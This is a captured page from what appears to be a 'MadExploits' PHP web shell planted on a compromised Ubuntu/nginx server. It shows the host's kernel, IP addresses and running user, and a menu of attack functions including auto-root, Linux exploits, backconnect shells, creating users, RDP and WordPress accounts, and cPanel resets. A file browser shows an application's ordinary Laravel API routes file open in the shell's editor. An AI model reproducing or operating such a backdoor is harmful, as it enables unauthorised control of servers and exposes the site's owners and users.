Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.2
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sms-auth /
app /
Modules /
Account /
Routes /
[ HOME SHELL ]
Name
Size
Permission
Action
.gitkeep
0
B
-rw-rw-r--
api.php
1.14
KB
-rw-rw-r--
web.php
488
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : api.php
<?php use App\Modules\Auth\DTO\LoggedUserDTO; /* |-------------------------------------------------------------------------- | API Routes |-------------------------------------------------------------------------- | | Here is where you can register API routes for your application. These | routes are loaded by the RouteServiceProvider within a group which | is assigned the "api" middleware group. Enjoy building your API! | */ Route::group(['prefix' => 'v1'], function(){ Route::group(['middleware' => ['client']], function () { Route::group(['prefix' => '/{type}'], function () { //Account Route::group(['prefix' => '/accounts'], function () { Route::post('/save', 'AccountController@saveAccount'); Route::put('/update', 'AccountController@updateAccount'); Route::delete('/delete', 'AccountController@deleteAccount'); Route::post('/list', 'AccountController@listAccount'); Route::get('/get', 'AccountController@getAccount'); Route::post('/update/{slug}', 'AccountController@updateByUuid'); }); }); }); });
Close